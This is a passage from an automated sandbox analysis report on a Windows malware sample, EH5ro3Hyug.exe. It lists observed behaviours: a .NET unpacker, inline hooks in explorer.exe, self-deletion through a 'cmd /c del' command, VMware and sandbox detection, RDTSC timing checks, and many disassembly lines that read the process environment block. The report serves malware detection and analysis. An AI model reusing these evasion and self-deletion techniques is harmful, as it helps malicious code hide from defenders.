            Source: EH5ro3Hyug.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: EH5ro3Hyug.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: WWAHost.pdb | source: EH5ro3Hyug.exe, 00000006.00000002.757233904.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: WWAHost.pdbUGP | source: EH5ro3Hyug.exe, 00000006.00000002.757233904.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP | source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmp, WWAHost.exe, 0000000C.00000002.935271786.0000000003C5F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb | source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmp, WWAHost.exe

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: EH5ro3Hyug.exe, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.EH5ro3Hyug.exe.810000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.EH5ro3Hyug.exe.c0000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.EH5ro3Hyug.exe.c0000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 6.0.EH5ro3Hyug.exe.f20000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 6.2.EH5ro3Hyug.exe.f20000.1.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 0_2_092FDC25 push FFFFFF8Bh; iretd
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041716F push ebx; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0040E288 push ebp; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041D4F2 push eax; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041D4FB push eax; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041D4A5 push eax; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041D55C push eax; ret
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_0041ED7F push dword ptr [F1875581h]; ret
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BBD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A8E288 push ebp; ret
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9716F push ebx; ret
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9D4A5 push eax; ret
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9D4FB push eax; ret
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9D4F2 push eax; ret
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9ED7F push dword ptr [F1875581h]; ret
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_02A9D55C push eax; ret
            Source: initial sample | Static PE information: section name: .text entropy: 7.04755215007

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE9
            Self deletion via cmd delete
            Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WWAHost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match | File source: 0.2.EH5ro3Hyug.exe.2c48584.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.689245304.0000000002C6F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: EH5ro3Hyug.exe PID: 6400, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\WWAHost.exe | RDTSC instruction interceptor: First address: 0000000002A89904 second address: 0000000002A8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\WWAHost.exe | RDTSC instruction interceptor: First address: 0000000002A89B6E second address: 0000000002A89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe TID: 6384 | Thread sleep time: -43496s >= -30000s
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe TID: 5296 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 5988 | Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\WWAHost.exe TID: 5324 | Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\WWAHost.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_00409AA0 rdtsc
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Thread delayed: delay time: 43496
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Thread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000007.00000000.712515284.0000000004791000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.704956994.000000000A868000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.717364088.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp | Binary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.790011664.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.712354446.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000007.00000000.717543897.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
            Source: explorer.exe, 00000007.00000000.717543897.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 6_2_00409AA0 rdtsc
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WWAHost.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B94BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B78794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B9B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B92397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B71B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C1D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03C2138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03BA37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B8DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 12_2_03B903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C35BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B64F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B64F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B93B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B93B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C2131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C1FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B776E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B916E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B936CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C1B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C1B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B83A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B65210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B65210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B65210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B65210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B98E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B78A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BF4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C1FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B935A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B961A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B961A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C18DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BF41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
